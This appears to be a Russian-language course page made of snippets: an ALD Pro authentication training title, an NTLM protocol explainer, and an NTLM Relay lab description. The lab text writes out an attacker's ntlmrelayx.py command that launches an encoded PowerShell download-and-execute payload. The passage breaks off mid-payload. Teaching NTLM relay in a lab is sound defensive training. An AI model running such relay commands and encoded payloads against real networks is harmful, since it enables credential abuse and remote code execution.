Виды аутентификации в ALD Pro - LDAP, Kerberos, NTLM. Обучение по ALD Pro.
Принцип работы протокола NTLM: подробное объяснение
Протокол NTLM (NT LAN Manager) — это один из старейших протоколов аутентификации, разработанный компанией Microsoft. Он используется для обеспечения безопасности при доступе к ресурсам в сетях Windows. В этой статье мы подробно рассмотрим принцип работы NTLM, его основные компоненты и механизмы, а также его преимущества и недостатки. Что такое NTLM? NTLM — это протокол аутентификации, который был разработан для работы в сетях Windows. Он используется для проверки подлинности пользователей и обеспечения безопасного доступа к ресурсам, таким как файлы, принтеры и другие сетевые службы...
NTLM Relay
Протокол NTLM - старый, в нем великое множество архитектурных проблем, которые латаются с разной степенью успеха и надо бы его уже отправить на покой, однако, он по-прежнему вынужденно используется в сетях Windows. И его по-прежнему атакуют! Одной из старых атак, имеющих исправление, являетcя NTLM Relay. В курсе у нас есть лаба со следующим сценарием. 1. Атакующий запускает перехватчик: ntlmrelayx.py -tf targets.txt -c 'powershell.exe -exec bypass -enc SQBFAFgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgB